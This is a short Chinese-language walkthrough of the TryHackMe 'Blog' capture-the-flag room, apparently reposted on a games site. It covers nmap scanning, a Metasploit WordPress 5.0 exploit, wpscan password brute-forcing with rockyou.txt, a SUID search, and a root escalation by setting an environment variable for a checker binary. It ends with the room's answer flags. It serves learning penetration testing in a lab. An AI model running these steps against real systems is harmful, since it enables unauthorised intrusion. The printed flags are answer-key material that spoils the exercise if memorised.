易妖游戏网
您的当前位置:首页tryhackme--Blog

tryhackme--Blog

来源:易妖游戏网

tryhackme–Blog

nmap扫描

nmap -T4 -sS -sV 10.10.223.252 -sC 

CMS和版本都知道了,本地查找漏洞

msf有利用脚本

wpscan --url http://10.10.150.219/ -U user.txt -P tools/dict/rockyou.txt

find / -name *user.txt > 2.txt
cat 2.txt

find / -type f -perm -u=s 2>/dev/null

执行命令他说我们不是admin,并且为一个位elf文件,用ltrace查看他引用了哪些函数,看到getenv()函数,就可以知道他与环境变量有关,添加一个环境变量:admin=1,再执行命令权限已经为root,好家伙又学到了一招。

 export admin=1
 /usr/sbin/checker

接下来我们找user.txt的位置和值,找和bjoel用户有关的文件

find / -user bjoel > 2.txt
cat 2.txt


所以问题的答案:

root.txt

9a0b2b618bef9bfa7ac28c1353d9f318

user.txt

c84219aae571f7af42b71a8ab7

Where was user.txt found?

/media/usb

What CMS was Billy using?

Wordpress

What version of the above CMS was being used?

5.0

ps:

个人站点博客:,欢迎来踩~

因篇幅问题不能全部显示,请点此查看更多更全内容